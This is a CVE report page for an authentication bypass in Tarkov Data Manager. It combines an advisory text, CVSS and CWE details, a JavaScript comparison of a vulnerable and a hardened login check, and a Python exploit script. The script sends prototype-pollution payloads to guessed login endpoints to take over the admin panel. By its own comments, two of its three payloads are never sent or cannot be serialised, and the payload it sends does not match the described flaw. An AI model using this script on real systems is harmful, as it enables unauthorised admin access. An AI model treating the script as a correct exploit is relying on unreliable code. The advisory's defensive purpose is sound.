Security Vulnerability Report
CVE-2026-21854 (CVSS 9.8, CRITICAL)

Published: 2026-01-07 19:15:57
Last Modified: 2026-02-03 16:21:12

Description

The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, an authentication bypass vulnerability in the login endpoint allows any unauthenticated user to gain full admin access to the Tarkov Data Manager admin panel by exploiting a JavaScript prototype property access vulnerability, combined with loose equality type coercion. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities.
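The description names two weaknesses working together: a credential lookup that walks the JavaScript prototype chain and a comparison done with `==`. The following is an added illustration of that pattern beside a hardened version; it is a hypothetical login check, not the Tarkov Data Manager's own code, and the `users` table and both functions are constructed for this example.

```javascript
// Constructed user store: a plain object used as a lookup table. Keys that
// exist on Object.prototype ("__proto__", "constructor", "toString", ...)
// resolve to inherited values instead of `undefined`. Plaintext passwords
// are used only to keep the example short.
const users = { alice: { password: "s3cret", isAdmin: true } };

// Vulnerable pattern (hypothetical, not the project's code): the lookup
// walks the prototype chain and the comparison uses loose equality.
function vulnerableLogin(body) {
  const user = users[body.username]; // "__proto__" -> Object.prototype, which is truthy
  if (!user) return false;
  // `user.password` is undefined on an inherited object; with a JSON
  // `null` password, `undefined == null` evaluates to true.
  return user.password == body.password;
}

// Hardened pattern: accept only string credentials, look up own properties
// only, and compare with strict equality.
function hardenedLogin(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return false; // rejects null, numbers, arrays and objects from the JSON body
  }
  if (!Object.hasOwn(users, body.username)) {
    return false; // no prototype-chain walk: "__proto__"/"constructor" are not own keys
  }
  return users[body.username].password === body.password;
}
```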

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability Score
3.9
Impact Score
5.9

Configurations (Affected Products)

cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:* - VULNERABLE
Tarkov Data Manager < 2025-01-02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-21854 Authentication Bypass PoC
# Target: Tarkov Data Manager login endpoint


def exploit_auth_bypass(target_url):
    """
    Exploit the authentication bypass vulnerability in Tarkov Data Manager
    by leveraging JavaScript prototype pollution and loose equality comparison
    """
    # Method 1: Prototype pollution with __proto__ property
    payload_proto = {
        "username": {"__proto__": {"isAdmin": True}},
        "password": "any_password"
    }

    # Method 2: Loose equality type coercion bypass
    # Note: this dict is never sent below; a dict containing lambdas cannot
    # be JSON-serialised by requests.
    payload_coercion = {
        "username": "admin",
        "password": {
            "toString": lambda: "",
            "valueOf": lambda: True
        }
    }

    # Method 3: Combined prototype pollution and type confusion
    # Note: defined but never sent below.
    payload_combined = {
        "__proto__": {
            "constructor": {
                "prototype": {
                    "admin": True
                }
            }
        },
        "username": "",
        "password": {
            "__proto__": {"authenticated": True}
        }
    }

    # Candidate endpoint paths; the report does not confirm which, if any, exists.
    endpoints = [
        "/api/auth/login",
        "/api/login",
        "/auth/login",
        "/login"
    ]

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint

        # Try prototype pollution attack
        try:
            response = requests.post(url, json=payload_proto, timeout=10)
            if response.status_code == 200:
                data = response.json()
                if data.get('admin') or data.get('isAdmin') or 'token' in data:
                    print(f"[!] Auth bypass successful at {url}")
                    print(f"[+] Response: {json.dumps(data, indent=2)}")
                    return data
        except Exception as e:
            print(f"[-] Error testing {url}: {e}")

    return None


if __name__ == "__main__":
    target = "https://tarkov-data-manager.example.com"
    result = exploit_auth_bypass(target)
    if result:
        print("\n[!] Vulnerability confirmed - Authentication bypassed")
    else:
        print("\n[-] Exploitation failed or target not vulnerable")
```

Weaknesses

CWE-287 (Improper Authentication)
CWE-843 (Access of Resource Using Incompatible Type, 'Type Confusion')
CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, 'Prototype Pollution')

References

https://github.com/the-hideout/tarkov-data-manager/commit/f188f0abf766cefe3f1b7b4fc6fe9dad3736174a (Patch)
https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-r8w6-9xwg-6h73 (Vendor Advisory)